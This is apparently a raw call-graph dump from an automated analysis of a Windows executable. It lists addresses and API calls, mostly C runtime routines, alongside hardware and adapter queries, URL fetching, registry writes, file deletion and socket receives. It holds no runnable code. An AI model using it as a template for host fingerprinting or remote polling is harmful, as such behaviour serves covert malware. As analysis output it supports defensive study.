19150->19146 19152 9c90fb __realloc_crt 62 API calls 19150->19152 19153 9c396a RtlEncodePointer 19150->19153 19154 9c3964 19152->19154 19153->19148 19154->19146 19154->19153 19192 9c8b9b 19155->19192 19159 9c977b RtlSizeHeap 19158->19159 19160 9c9766 19158->19160 19159->19149 19161 9c645b strtoxl 59 API calls 19160->19161 19162 9c976b 19161->19162 19163 9c54f5 strtoxl 9 API calls 19162->19163 19164 9c9776 19163->19164 19164->19149 19168 9c9102 19165->19168 19167 9c913f 19167->19150 19168->19167 19170 9d09a4 19168->19170 19191 9c9b05 Sleep 19168->19191 19171 9d09ad 19170->19171 19172 9d09b8 19170->19172 19173 9c35ac _malloc 59 API calls 19171->19173 19174 9d09c0 19172->19174 19183 9d09cd 19172->19183 19175 9d09b5 19173->19175 19176 9c3574 _free 59 API calls 19174->19176 19175->19168 19190 9d09c8 _free 19176->19190 19177 9d0a05 19178 9c8803 _malloc RtlDecodePointer 19177->19178 19179 9d09d5 RtlReAllocateHeap 19179->19183 19179->19190 19182 9d0a35 19185 9c645b strtoxl 59 API calls 19182->19185 19183->19177 19183->19179 19183->19182 19184 9c8803 _malloc RtlDecodePointer 19183->19184 19187 9d0a1d 19183->19187 19184->19183 19188 9c645b strtoxl 59 API calls 19187->19188 19190->19168 19191->19168 19195 9c9057 RtlLeaveCriticalSection 19192->19195 19194 9c38eb 19194->19140 19195->19194 19197 9c97bf 19196->19197 19198 9c97c3 TlsFree 19196->19198 19197->18597 19198->18597 19200 9d0ac3 19199->19200 19206 9d0ade 19199->19206 19201 9d0acf 19200->19201 19200->19206 19203 9c645b strtoxl 58 API calls 19201->19203 19202 9d0aee RtlAllocateHeap 19204 9d0ad4 19202->19204 19202->19206 19203->19204 19204->18643 19205 9c8803 _malloc RtlDecodePointer 19205->19206 19206->19202 19206->19204 19206->19205 19207->18647 19214 9c9057 RtlLeaveCriticalSection 19208->19214 19210 9c6344 19210->18657 19215 9c9057 RtlLeaveCriticalSection 19211->19215 19213 9c6392 19213->18660 19214->19210 19215->19213 19217 9c60fb CallCatchBlock 19216->19217 19218 9c6114 19217->19218 19219 9c6203 CallCatchBlock 
19217->19219 19220 9c3574 _free 59 API calls 19217->19220 19221 9c3574 _free 59 API calls 19218->19221 19223 9c6123 19218->19223 19219->18674 19220->19218 19221->19223 19222 9c6141 19226 9c6150 19222->19226 19228 9c3574 _free 59 API calls 19222->19228 19224 9c3574 _free 59 API calls 19223->19224 19227 9c6132 19223->19227 19224->19227 19225 9c3574 _free 59 API calls 19225->19222 19229 9c615f 19226->19229 19230 9c3574 _free 59 API calls 19226->19230 19227->19222 19227->19225 19228->19226 19231 9c616e 19229->19231 19233 9c3574 _free 59 API calls 19229->19233 19230->19229 19232 9c6180 19231->19232 19234 9c3574 _free 59 API calls 19231->19234 19235 9c8eed __lock 59 API calls 19232->19235 19233->19231 19234->19232 19238 9c6188 19235->19238 19236 9c61ab 19248 9c620f 19236->19248 19238->19236 19240 9c3574 _free 59 API calls 19238->19240 19240->19236 19241 9c8eed __lock 59 API calls 19246 9c61bf ___removelocaleref 19241->19246 19242 9c61f0 19281 9c621b 19242->19281 19245 9c3574 _free 59 API calls 19245->19219 19246->19242 19251 9c55c5 19246->19251 19284 9c9057 RtlLeaveCriticalSection 19248->19284 19250 9c61b8 19250->19241 19252 9c563e 19251->19252 19253 9c55da 19251->19253 19254 9c568b 19252->19254 19255 9c3574 _free 59 API calls 19252->19255 19253->19252 19261 9c560b 19253->19261 19264 9c3574 _free 59 API calls 19253->19264 19257 9c56b4 19254->19257 19325 9cdb3d 19254->19325 19258 9c565f 19255->19258 19266 9c5713 19257->19266 19276 9c3574 59 API calls _free 19257->19276 19260 9c3574 _free 59 API calls 19258->19260 19262 9c5672 19260->19262 19267 9c3574 _free 59 API calls 19261->19267 19280 9c5629 19261->19280 19268 9c3574 _free 59 API calls 19262->19268 19263 9c3574 _free 59 API calls 19269 9c5633 19263->19269 19270 9c5600 19264->19270 19265 9c3574 _free 59 API calls 19265->19257 19271 9c3574 _free 59 API calls 19266->19271 19273 9c561e 19267->19273 19274 9c5680 19268->19274 19275 9c3574 _free 59 API calls 19269->19275 19285 9cd9da 19270->19285 19272 9c5719 19271->19272 
19272->19242 19313 9cdad6 19273->19313 19279 9c3574 _free 59 API calls 19274->19279 19275->19252 19276->19257 19279->19254 19280->19263 19501 9c9057 RtlLeaveCriticalSection 19281->19501 19283 9c61fd 19283->19245 19284->19250 19286 9cd9e9 19285->19286 19312 9cdad2 19285->19312 19287 9cd9fa 19286->19287 19289 9c3574 _free 59 API calls 19286->19289 19288 9cda0c 19287->19288 19290 9c3574 _free 59 API calls 19287->19290 19291 9cda1e 19288->19291 19292 9c3574 _free 59 API calls 19288->19292 19289->19287 19290->19288 19293 9cda30 19291->19293 19294 9c3574 _free 59 API calls 19291->19294 19292->19291 19295 9cda42 19293->19295 19297 9c3574 _free 59 API calls 19293->19297 19294->19293 19296 9cda54 19295->19296 19298 9c3574 _free 59 API calls 19295->19298 19299 9cda66 19296->19299 19300 9c3574 _free 59 API calls 19296->19300 19297->19295 19298->19296 19301 9cda78 19299->19301 19302 9c3574 _free 59 API calls 19299->19302 19300->19299 19303 9cda8a 19301->19303 19305 9c3574 _free 59 API calls 19301->19305 19302->19301 19304 9cda9c 19303->19304 19306 9c3574 _free 59 API calls 19303->19306 19307 9cdaae 19304->19307 19308 9c3574 _free 59 API calls 19304->19308 19305->19303 19306->19304 19309 9c3574 _free 59 API calls 19307->19309 19310 9cdac0 19307->19310 19308->19307 19309->19310 19311 9c3574 _free 59 API calls 19310->19311 19310->19312 19311->19312 19312->19261 19314 9cdae1 19313->19314 19324 9cdb39 19313->19324 19315 9cdaf1 19314->19315 19316 9c3574 _free 59 API calls 19314->19316 19317 9cdb03 19315->19317 19319 9c3574 _free 59 API calls 19315->19319 19316->19315 19318 9cdb15 19317->19318 19320 9c3574 _free 59 API calls 19317->19320 19321 9cdb27 19318->19321 19322 9c3574 _free 59 API calls 19318->19322 19319->19317 19320->19318 19323 9c3574 _free 59 API calls 19321->19323 19321->19324 19322->19321 19323->19324 19324->19280 19326 9cdb4c 19325->19326 19327 9c56a9 19325->19327 19328 9c3574 _free 59 API calls 19326->19328 19327->19265 19329 9cdb54 19328->19329 19330 9c3574 _free 59 
API calls 19329->19330 19331 9cdb5c 19330->19331 19332 9c3574 _free 59 API calls 19331->19332 19333 9cdb64 19332->19333 19334 9c3574 _free 59 API calls 19333->19334 19335 9cdb6c 19334->19335 19336 9c3574 _free 59 API calls 19335->19336 19337 9cdb74 19336->19337 19338 9c3574 _free 59 API calls 19337->19338 19339 9cdb7c 19338->19339 19340 9c3574 _free 59 API calls 19339->19340 19341 9cdb83 19340->19341 19342 9c3574 _free 59 API calls 19341->19342 19343 9cdb8b 19342->19343 19344 9c3574 _free 59 API calls 19343->19344 19345 9cdb93 19344->19345 19346 9c3574 _free 59 API calls 19345->19346 19347 9cdb9b 19346->19347 19348 9c3574 _free 59 API calls 19347->19348 19349 9cdba3 19348->19349 19350 9c3574 _free 59 API calls 19349->19350 19351 9cdbab 19350->19351 19352 9c3574 _free 59 API calls 19351->19352 19353 9cdbb3 19352->19353 19354 9c3574 _free 59 API calls 19353->19354 19355 9cdbbb 19354->19355 19356 9c3574 _free 59 API calls 19355->19356 19357 9cdbc3 19356->19357 19358 9c3574 _free 59 API calls 19357->19358 19359 9cdbcb 19358->19359 19501->19283 19502 9bfe99 CreateFileA 19503 9bfeca 19502->19503 19504 9bff95 19502->19504 19505 9bfee2 DeviceIoControl 19503->19505 19506 9bff8b FindCloseChangeNotification 19503->19506 19507 9bff57 GetLastError 19503->19507 19509 9c414c 19503->19509 19505->19503 19506->19504 19507->19503 19507->19506 19512 9c4154 19509->19512 19510 9c35ac _malloc 59 API calls 19510->19512 19511 9c416e 19511->19503 19512->19510 19512->19511 19513 9c8803 _malloc RtlDecodePointer 19512->19513 19514 9c4172 std::exception::exception 19512->19514 19513->19512 19517 9c4b5a 19514->19517 19516 9c419c 19518 9c4b79 RaiseException 19517->19518 19518->19516 19520 40d1e3 lstrcmpiW 19521 9bff9d LoadLibraryA 19522 9c0080 19521->19522 19523 9bffc6 GetProcAddress 19521->19523 19524 9bffda 19523->19524 19525 9c0079 FreeLibrary 19523->19525 19526 9bffec GetAdaptersInfo 19524->19526 19527 9c0074 19524->19527 19528 9c414c _Allocate 60 API calls 19524->19528 19525->19522 
19526->19524 19527->19525 19528->19524 19529 9ef272 19530 9ef27b 19529->19530 19531 9ef2a0 19529->19531 19530->19531 19532 a512b1 DeleteFileA 19530->19532 19533 a2938f 19534 a29a24 Sleep 19533->19534 19535 40286e CreateThread 19536 40d73d 19535->19536 19537 4022cb 19535->19537 19538 40d699 19537->19538 19539 9b69cb RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 19578 9b42c7 19539->19578 19579 403112 GetVersion 19603 40344a HeapCreate 19579->19603 19581 403171 19582 403176 19581->19582 19583 40317e 19581->19583 19678 40322d 19582->19678 19615 404ee6 19583->19615 19587 403186 GetCommandLineA 19629 404db4 19587->19629 19591 4031a0 19661 404aae 19591->19661 19593 4031a5 19594 4031aa GetStartupInfoA 19593->19594 19674 404a56 19594->19674 19596 4031bc GetModuleHandleA 19598 4031e0 19596->19598 19684 4047fd 19598->19684 19604 4034a0 19603->19604 19605 40346a 19603->19605 19604->19581 19691 403302 19605->19691 19608 403486 19611 4034a3 19608->19611 19705 403cf8 19608->19705 19609 403479 19703 4034a7 HeapAlloc 19609->19703 19611->19581 19612 403483 19612->19611 19614 403494 HeapDestroy 19612->19614 19614->19604 19768 403010 19615->19768 19618 404f05 GetStartupInfoA 19626 405016 19618->19626 19628 404f51 19618->19628 19621 40507d SetHandleCount 19621->19587 19622 40503d GetStdHandle 19624 40504b GetFileType 19622->19624 19622->19626 19623 403010 12 API calls 19623->19628 19624->19626 19625 404fc2 19625->19626 19627 404fe4 GetFileType 19625->19627 19626->19621 19626->19622 19627->19625 19628->19623 19628->19625 19628->19626 19630 404e02 19629->19630 19631 404dcf GetEnvironmentStringsW 19629->19631 19632 404dd7 19630->19632 19633 404df3 19630->19633 19631->19632 19634 404de3 GetEnvironmentStrings 19631->19634 19636 404e1b WideCharToMultiByte 19632->19636 19637 404e0f GetEnvironmentStringsW 19632->19637 19635 403196 19633->19635 19638 404ea1 19633->19638 19639 404e95 GetEnvironmentStrings 19633->19639 19634->19633 19634->19635 19652 
404b67 19635->19652 19641 404e81 FreeEnvironmentStringsW 19636->19641 19642 404e4f 19636->19642 19637->19635 19637->19636 19643 403010 12 API calls 19638->19643 19639->19635 19639->19638 19641->19635 19644 403010 12 API calls 19642->19644 19649 404ebc 19643->19649 19645 404e55 19644->19645 19645->19641 19646 404e5e WideCharToMultiByte 19645->19646 19648 404e6f 19646->19648 19651 404e78 19646->19651 19647 404ed2 FreeEnvironmentStringsA 19647->19635 19834 403251 19648->19834 19649->19647 19651->19641 19653 404b79 19652->19653 19654 404b7e GetModuleFileNameA 19652->19654 19864 406707 19653->19864 19656 404ba1 19654->19656 19657 403010 12 API calls 19656->19657 19658 404bc2 19657->19658 19659 404bd2 19658->19659 19660 403208 7 API calls 19658->19660 19659->19591 19660->19659 19662 404abb 19661->19662 19664 404ac0 19661->19664 19663 406707 19 API calls 19662->19663 19663->19664 19665 403010 12 API calls 19664->19665 19666 404aed 19665->19666 19667 403208 7 API calls 19666->19667 19673 404b01 19666->19673 19667->19673 19668 404b44 19669 403251 7 API calls 19668->19669 19670 404b50 19669->19670 19670->19593 19671 403010 12 API calls 19671->19673 19672 403208 7 API calls 19672->19673 19673->19668 19673->19671 19673->19672 19675 404a5f 19674->19675 19677 404a64 19674->19677 19676 406707 19 API calls 19675->19676 19676->19677 19677->19596 19679 403236 19678->19679 19680 40323b 19678->19680 19681 405264 7 API calls 19679->19681 19682 40529d 7 API calls 19680->19682 19681->19680 19683 403244 ExitProcess 19682->19683 19888 40481f 19684->19888 19687 4048d2 19688 4048de 19687->19688 19689 404a07 UnhandledExceptionFilter 19688->19689 19690 4031fa 19688->19690 19689->19690 19714 402ef0 19691->19714 19694 403345 GetEnvironmentVariableA 19696 403422 19694->19696 19699 403364 19694->19699 19695 40332b 19695->19694 19697 40333d 19695->19697 19696->19697 19719 4032d5 GetModuleHandleA 19696->19719 19697->19608 19697->19609 19700 4033a9 GetModuleFileNameA 19699->19700 19701 4033a1 
19699->19701 19700->19701 19701->19696 19716 4053f0 19701->19716 19704 4034c3 19703->19704 19704->19612 19706 403d05 19705->19706 19707 403d0c HeapAlloc 19705->19707 19708 403d29 VirtualAlloc 19706->19708 19707->19708 19713 403d61 19707->19713 19709 403d49 VirtualAlloc 19708->19709 19710 403e1e 19708->19710 19711 403e10 VirtualFree 19709->19711 19709->19713 19712 403e26 HeapFree 19710->19712 19710->19713 19711->19710 19712->19713 19713->19612 19715 402efc GetVersionExA 19714->19715 19715->19694 19715->19695 19721 405407 19716->19721 19720 4032ec 19719->19720 19720->19697 19723 40541f 19721->19723 19724 40544f 19723->19724 19728 405c3b 19723->19728 19725 405403 19724->19725 19726 405c3b 6 API calls 19724->19726 19732 4068ae 19724->19732 19725->19696 19726->19724 19729 405c59 19728->19729 19731 405c4d 19728->19731 19738 40697a 19729->19738 19731->19723 19733 4068d9 19732->19733 19737 4068bc 19732->19737 19734 4068f5 19733->19734 19735 405c3b 6 API calls 19733->19735 19734->19737 19750 406ac3 19734->19750 19735->19734 19737->19724 19739 4069c3 19738->19739 19740 4069ab GetStringTypeW 19738->19740 19741 406a12 19739->19741 19742 4069ee GetStringTypeA 19739->19742 19740->19739 19743 4069c7 GetStringTypeA 19740->19743 19745 406aaf 19741->19745 19746 406a28 MultiByteToWideChar 19741->19746 19742->19745 19743->19739 19743->19745 19745->19731 19746->19745 19747 406a4c 19746->19747 19747->19745 19748 406a86 MultiByteToWideChar 19747->19748 19748->19745 19749 406a9f GetStringTypeW 19748->19749 19749->19745 19751 406af3 LCMapStringW 19750->19751 19752 406b0f 19750->19752 19751->19752 19753 406b17 LCMapStringA 19751->19753 19754 406b75 19752->19754 19755 406b58 LCMapStringA 19752->19755 19753->19752 19762 406c51 19753->19762 19756 406b8b MultiByteToWideChar 19754->19756 19754->19762 19755->19762 19757 406bb5 19756->19757 19756->19762 19758 406beb MultiByteToWideChar 19757->19758 19757->19762 19759 406c04 LCMapStringW 19758->19759 19758->19762 19760 406c1f 19759->19760 
19759->19762 19761 406c25 19760->19761 19764 406c65 19760->19764 19761->19762 19763 406c33 LCMapStringW 19761->19763 19762->19737 19763->19762 19764->19762 19765 406c9d LCMapStringW 19764->19765 19765->19762 19766 406cb5 WideCharToMultiByte 19765->19766 19766->19762 19777 403022 19768->19777 19771 403208 19772 403211 19771->19772 19773 403216 19771->19773 19814 405264 19772->19814 19820 40529d 19773->19820 19778 40301f 19777->19778 19780 403029 19777->19780 19778->19618 19778->19771 19780->19778 19781 40304e 19780->19781 19782 40305d 19781->19782 19785 403072 19781->19785 19789 40306b 19782->19789 19790 403843 19782->19790 19784 4030b1 HeapAlloc 19786 4030c0 19784->19786 19785->19784 19785->19789 19796 403ff0 19785->19796 19786->19780 19787 403070 19787->19780 19789->19784 19789->19786 19789->19787 19794 403875 19790->19794 19791 403914 19793 403923 19791->19793 19810 403bfd 19791->19810 19793->19789 19794->19791 19794->19793 19803 403b4c 19794->19803 19797 403ffe 19796->19797 19798 4041bf 19797->19798 19801 4040ea VirtualAlloc 19797->19801 19802 4040bb 19797->19802 19799 403cf8 5 API calls 19798->19799 19799->19802 19801->19802 19802->19789 19804 403b8f HeapAlloc 19803->19804 19805 403b5f HeapReAlloc 19803->19805 19807 403bb5 VirtualAlloc 19804->19807 19809 403bdf 19804->19809 19806 403b7e 19805->19806 19805->19809 19806->19804 19808 403bcf HeapFree 19807->19808 19807->19809 19808->19809 19809->19791 19811 403c0f VirtualAlloc 19810->19811 19813 403c58 19811->19813 19813->19793 19815 40526e 19814->19815 19816 40529d 7 API calls 19815->19816 19819 40529b 19815->19819 19817 405285 19816->19817 19818 40529d 7 API calls 19817->19818 19818->19819 19819->19773 19823 4052b0 19820->19823 19821 40321f 19821->19618 19822 4053c7 19825 4053da GetStdHandle WriteFile 19822->19825 19823->19821 19823->19822 19824 4052f0 19823->19824 19824->19821 19826 4052fc GetModuleFileNameA 19824->19826 19825->19821 19827 405314 19826->19827 19829 406723 19827->19829 19830 406730 LoadLibraryA 
19829->19830 19832 406772 19829->19832 19831 406741 GetProcAddress 19830->19831 19830->19832 19831->19832 19833 406758 GetProcAddress GetProcAddress 19831->19833 19832->19821 19833->19832 19835 403279 19834->19835 19836 40325d 19834->19836 19835->19651 19837 403267 19836->19837 19838 40327d 19836->19838 19840 4032a9 HeapFree 19837->19840 19841 403273 19837->19841 19839 4032a8 19838->19839 19843 403297 19838->19843 19839->19840 19840->19835 19845 40351a 19841->19845 19851 403fab 19843->19851 19846 40380e 19845->19846 19847 403558 19845->19847 19846->19835 19847->19846 19848 403754 VirtualFree 19847->19848 19849 4037b8 19848->19849 19849->19846 19850 4037c7 VirtualFree HeapFree 19849->19850 19850->19846 19852 403fd8 19851->19852 19854 403fee 19851->19854 19852->19854 19855 403e92 19852->19855 19854->19835 19858 403e9f 19855->19858 19856 403f4f 19856->19854 19857 403ec0 VirtualFree 19857->19858 19858->19856 19858->19857 19860 403e3c VirtualFree 19858->19860 19861 403e59 19860->19861 19862 403e89 19861->19862 19863 403e69 HeapFree 19861->19863 19862->19858 19863->19858 19865 406710 19864->19865 19866 406717 19864->19866 19868 406343 19865->19868 19866->19654 19875 4064dc 19868->19875 19870 4064d0 19870->19866 19873 406386 GetCPInfo 19874 40639a 19873->19874 19874->19870 19880 406582 GetCPInfo 19874->19880 19876 4064fc 19875->19876 19877 4064ec GetOEMCP 19875->19877 19878 406354 19876->19878 19879 406501 GetACP 19876->19879 19877->19876 19878->19870 19878->19873 19878->19874 19879->19878 19883 4065a5 19880->19883 19887 40666d 19880->19887 19881 40697a 6 API calls 19882 406621 19881->19882 19884 406ac3 9 API calls 19882->19884 19883->19881 19885 406645 19884->19885 19886 406ac3 9 API calls 19885->19886 19886->19887 19887->19870 19889 40482b GetCurrentProcess TerminateProcess 19888->19889 19890 40483c 19888->19890 19889->19890 19891 4031e9 19890->19891 19892 4048a6 ExitProcess 19890->19892 19891->19687 19893 4028f4 RegSetValueExA RegCloseKey 19894 40d63e SetEvent 
19893->19894 19895 9b104d 19896 9c39a4 __cinit 68 API calls 19895->19896 19897 9b1057 19896->19897 19900 9b1aa9 InterlockedIncrement 19897->19900 19901 9b105c 19900->19901 19902 9b1ac5 WSAStartup InterlockedExchange 19900->19902 19902->19901 19903 402277 19904 40d2dd Sleep 19903->19904 19905 40d9fd 19904->19905 19906 402658 19907 40dbee RegCreateKeyExA 19906->19907 19908 40da78 19909 40da37 19908->19909 19911 40da41 19908->19911 19909->19911 19912 401f27 19909->19912 19911->19911 19913 401f3c 19912->19913 19916 401a1d 19913->19916 19915 401f45 19915->19911 19917 401a2c 19916->19917 19922 401a4f CreateFileA 19917->19922 19921 401a3e 19921->19915 19923 401a35 19922->19923 19928 401a7d 19922->19928 19930 401b4b LoadLibraryA 19923->19930 19924 401a98 DeviceIoControl 19924->19928 19925 401b3a FindCloseChangeNotification 19925->19923 19927 401b0e GetLastError 19927->19925 19927->19928 19928->19924 19928->19925 19928->19927 19939 402e56 19928->19939 19942 402e48 19928->19942 19931 401c21 19930->19931 19932 401b6e GetProcAddress 19930->19932 19931->19921 19933 401c18 FreeLibrary 19932->19933 19937 401b85 19932->19937 19933->19931 19934 401b95 GetAdaptersInfo 19934->19937 19935 402e56 7 API calls 19935->19937 19936 401c15 19936->19933 19937->19934 19937->19935 19937->19936 19938 402e48 12 API calls 19937->19938 19938->19937 19940 403251 7 API calls 19939->19940 19941 402e5f 19940->19941 19941->19928 19943 403022 12 API calls 19942->19943 19944 402e53 19943->19944 19944->19928 19945 9b78a7 InternetOpenA 19946 9b78c5 InternetSetOptionA InternetSetOptionA InternetSetOptionA 19945->19946 19955 9b7985 _memset 19945->19955 20048 9c50f0 19946->20048 19949 9b797e InternetCloseHandle 19949->19955 19950 9b6d0a RtlEnterCriticalSection RtlLeaveCriticalSection 19960 9b6cf0 _memset 19950->19960 19952 9b6d04 Sleep 19952->19950 19953 9b793e InternetReadFile 19954 9b7973 InternetCloseHandle 19953->19954 19954->19949 19956 9b79e5 RtlEnterCriticalSection RtlLeaveCriticalSection 19955->19956 
19955->19960 20050 9c293c 19956->20050 19958 9b7a0f 19959 9b7a5f 19958->19959 19962 9c293c 66 API calls 19958->19962 19959->19960 19961 9c293c 66 API calls 19959->19961 19960->19950 19960->19952 19963 9b7a80 19961->19963 19964 9b7a23 19962->19964 19965 9b7d39 19963->19965 19968 9c35ac _malloc 59 API calls 19963->19968 19964->19959 19967 9c293c 66 API calls 19964->19967 19966 9c293c 66 API calls 19965->19966 19969 9b7d51 19966->19969 19970 9b7a37 19967->19970 19971 9b7a99 RtlEnterCriticalSection RtlLeaveCriticalSection 19968->19971 19972 9b7d9e 19969->19972 19973 9b7d5b _memset 19969->19973 19970->19959 19975 9c293c 66 API calls 19970->19975 19998 9b7ad1 _memset 19971->19998 19974 9c293c 66 API calls 19972->19974 19978 9b7d6b RtlEnterCriticalSection RtlLeaveCriticalSection 19973->19978 19976 9b7dac 19974->19976 19977 9b7a4b 19975->19977 19979 9b7db2 19976->19979 19980 9b7dd1 19976->19980 19977->19959 19982 9c293c 66 API calls 19977->19982 19978->19960 20103 9b65a9 19979->20103 19983 9c293c 66 API calls 19980->19983 19982->19959 19984 9b7ddf 19983->19984 19985 9b8100 19984->19985 19989 9b7df1 19984->19989 19986 9c293c 66 API calls 19985->19986 19987 9b810e 19986->19987 19987->19960 19988 9c35ac _malloc 59 API calls 19987->19988 19994 9b8122 _memset 19988->19994 19989->19960 20133 9c2a18 19989->20133 19993 9b7eaa 19995 9b7ee2 RtlEnterCriticalSection 19993->19995 19999 9b814f 19994->19999 20205 9b5461 19994->20205 19996 9b7f0f RtlLeaveCriticalSection 19995->19996 19997 9b7f05 19995->19997 20153 9b3c67 19996->20153 19997->19996 20003 9c293c 66 API calls 19998->20003 20008 9b7b5e 19998->20008 20001 9c3574 _free 59 API calls 19999->20001 20000 9c35ac _malloc 59 API calls 20009 9b7b96 _memset 20000->20009 20001->19960 20003->20008 20008->20000 20012 9b7bf8 20009->20012 20106 9c3be6 20009->20106 20014 9c3574 _free 59 API calls 20012->20014 20013 9b80e7 20198 9b95f9 20013->20198 20018 9b7bfe 20014->20018 20018->19965 20020 9c414c _Allocate 60 API calls 20018->20020 20019 
9b80af 20183 9b89e0 20019->20183 20023 9b7c0e 20020->20023 20028 9b7c29 20023->20028 20118 9b9d2d 20023->20118 20027 9bad1b 73 API calls 20034 9b801a 20027->20034 20060 9bae45 20028->20060 20029 9b7bc4 20029->20012 20032 9c3be6 _strtok 60 API calls 20029->20032 20115 9c2e50 20029->20115 20032->20029 20033 9b7c3f 20064 9b522d 20033->20064 20034->20019 20035 9bad1b 73 API calls 20034->20035 20037 9b806b 20035->20037 20037->20019 20178 9bd70d 20037->20178 20039 9b7c88 20093 9bb205 20039->20093 20042 9b7ce8 shared_ptr 20043 9b7ced Sleep 20042->20043 20125 9c1ef0 20043->20125 20049 9b791e InternetOpenUrlA 20048->20049 20049->19949 20049->19953 20053 9c2948 20050->20053 20055 9c296b 20050->20055 20052 9c294e 20054 9c645b strtoxl 59 API calls 20052->20054 20053->20052 20053->20055 20057 9c2953 20054->20057 20215 9c2983 20055->20215 20056 9c297e 20056->19958 20058 9c54f5 strtoxl 9 API calls 20057->20058 20059 9c295e 20058->20059 20059->19958 20061 9bae4f __EH_prolog 20060->20061 20225 9be5f6 20061->20225 20063 9bae6d shared_ptr 20063->20033 20065 9b5237 __EH_prolog 20064->20065 20229 9c1110 20065->20229 20068 9b3c67 72 API calls 20069 9b525e 20068->20069 20070 9b3d7e 64 API calls 20069->20070 20071 9b526c 20070->20071 20072 9b8931 89 API calls 20071->20072 20073 9b5280 20072->20073 20074 9b5436 shared_ptr 20073->20074 20075 9bad1b 73 API calls 20073->20075 20074->20039 20076 9b52b1 20075->20076 20076->20074 20077 9b530a 20076->20077 20078 9b52d8 20076->20078 20079 9bad1b 73 API calls 20077->20079 20080 9bad1b 73 API calls 20078->20080 20082 9b531b 20079->20082 20081 9b52e8 20080->20081 20081->20074 20084 9bad1b 73 API calls 20081->20084 20082->20074 20083 9bad1b 73 API calls 20082->20083 20085 9b535e 20083->20085 20086 9b53c8 20084->20086 20085->20074 20087 9bad1b 73 API calls 20085->20087 20086->20074 20088 9bad1b 73 API calls 20086->20088 20087->20081 20089 9b53ee 20088->20089 20089->20074 20090 9bad1b 73 API calls 20089->20090 20091 9b5418 20090->20091 20233 9bd4cf 
20091->20233 20094 9bb20f __EH_prolog 20093->20094 20260 9bd6e4 20094->20260 20096 9bb230 shared_ptr 20263 9c26f0 20096->20263 20098 9bb247 20099 9b7cd5 20098->20099 20269 9b3fb0 20098->20269 20099->20042 20099->20043 20104 9c35ac _malloc 59 API calls 20103->20104 20105 9b65bc 20104->20105 20107 9c625a CallCatchBlock 59 API calls 20106->20107 20109 9c3c03 20107->20109 20108 9c3ca7 20711 9c9c76 20108->20711 20109->20108 20112 9c3c1c 20109->20112 20113 9c4b4b ___strgtold12_l 6 API calls 20112->20113 20114 9c3ca3 20113->20114 20114->20029 20718 9c2e6e 20115->20718 20117 9c2e69 20117->20029 20119 9b9d37 __EH_prolog 20118->20119 20120 9b1ba7 210 API calls 20119->20120 20121 9b9d8c 20120->20121 20122 9b9da9 RtlEnterCriticalSection 20121->20122 20123 9b9dc7 RtlLeaveCriticalSection 20122->20123 20124 9b9dc4 20122->20124 20123->20028 20124->20123 20134 9c2a49 20133->20134 20135 9c2a34 20133->20135 20134->20135 20137 9c2a50 20134->20137 20136 9c645b strtoxl 59 API calls 20135->20136 20138 9c2a39 20136->20138 20726 9c6650 20137->20726 20140 9c54f5 strtoxl 9 API calls 20138->20140 20142 9b7e27 20140->20142 20144 9b1ba7 20142->20144 20951 9d59f0 20144->20951 20146 9b1bb1 RtlEnterCriticalSection 20147 9b1be9 RtlLeaveCriticalSection 20146->20147 20149 9b1bd1 20146->20149 20952 9be926 20147->20952 20149->20147 20150 9b1c55 RtlLeaveCriticalSection 20149->20150 20150->19993 20151 9b1c22 20151->20150 20154 9c1110 Mailbox 68 API calls 20153->20154 20155 9b3c7e 20154->20155 21034 9b3ca2 20155->21034 20160 9b3d7e 20161 9b3dcb htons 20160->20161 20162 9b3d99 htons 20160->20162 21067 9b3c16 20161->21067 21061 9b3bd3 20162->21061 20166 9b3ded 20167 9b8931 20166->20167 20168 9b8949 20167->20168 20169 9b896a 20167->20169 21098 9b9bf3 20168->21098 20172 9b7f6c 20169->20172 21101 9b2ac7 20169->21101 20172->20013 20173 9bad1b 20172->20173 20174 9c1110 Mailbox 68 API calls 20173->20174 20175 9bad35 20174->20175 20176 9b7fb8 20175->20176 21195 9b2db5 20175->21195 20176->20019 20176->20027 20179 
9c1110 Mailbox 68 API calls 20178->20179 20184 9b89fb WSASetLastError shutdown 20183->20184 20185 9b89eb 20183->20185 20187 9baaff 69 API calls 20184->20187 20186 9c1110 Mailbox 68 API calls 20185->20186 20188 9b80c7 20186->20188 20189 9b8a18 20187->20189 20191 9b33b2 20188->20191 20189->20188 20190 9c1110 Mailbox 68 API calls 20189->20190 20190->20188 20199 9b9603 __EH_prolog 20198->20199 21272 9b373f 20199->21272 20201 9b961d RtlEnterCriticalSection 20206 9c35ac _malloc 59 API calls 20205->20206 20207 9b5476 SHGetSpecialFolderPathA 20206->20207 20208 9b548c 20207->20208 20208->20208 21281 9c3d71 20208->21281 20211 9b54f6 20211->19999 20213 9b54f0 21297 9c4084 20213->21297 20216 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 20215->20216 20217 9c2997 20216->20217 20218 9c29a5 20217->20218 20224 9c29bc 20217->20224 20219 9c645b strtoxl 59 API calls 20218->20219 20220 9c29aa 20219->20220 20221 9c54f5 strtoxl 9 API calls 20220->20221 20223 9c29b5 ___ascii_stricmp 20221->20223 20222 9c5f7a 66 API calls __tolower_l 20222->20224 20223->20056 20224->20222 20224->20223 20226 9be600 __EH_prolog 20225->20226 20227 9c414c _Allocate 60 API calls 20226->20227 20228 9be617 20227->20228 20228->20063 20230 9c1139 20229->20230 20231 9b5251 20229->20231 20232 9c39a4 __cinit 68 API calls 20230->20232 20231->20068 20232->20231 20234 9c1110 Mailbox 68 API calls 20233->20234 20235 9bd4e9 20234->20235 20236 9bd5f8 20235->20236 20238 9b2b95 20235->20238 20236->20074 20239 9b2bb1 20238->20239 20240 9b2bc7 20238->20240 20241 9c1110 Mailbox 68 API calls 20239->20241 20243 9b2bd2 20240->20243 20251 9b2bdf 20240->20251 20246 9b2bb6 20241->20246 20242 9b2be2 WSASetLastError WSARecv 20253 9baaff 20242->20253 20245 9c1110 Mailbox 68 API calls 20243->20245 20245->20246 20246->20235 20247 9b2d22 20256 9b1996 20247->20256 20249 9b2cbc WSASetLastError select 20250 9baaff 69 API calls 20249->20250 20250->20251 20251->20242 20251->20246 20251->20247 20251->20249 20252 9c1110 68 API calls Mailbox 
